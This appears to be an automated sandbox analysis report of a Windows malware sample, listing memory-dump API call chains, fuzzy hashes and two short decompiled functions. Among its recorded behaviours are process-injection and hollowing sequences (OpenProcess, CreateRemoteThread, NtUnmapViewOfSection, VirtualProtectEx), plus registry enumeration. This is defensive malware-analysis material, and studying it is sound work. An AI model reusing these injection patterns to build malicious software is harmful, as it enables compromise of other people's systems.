  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
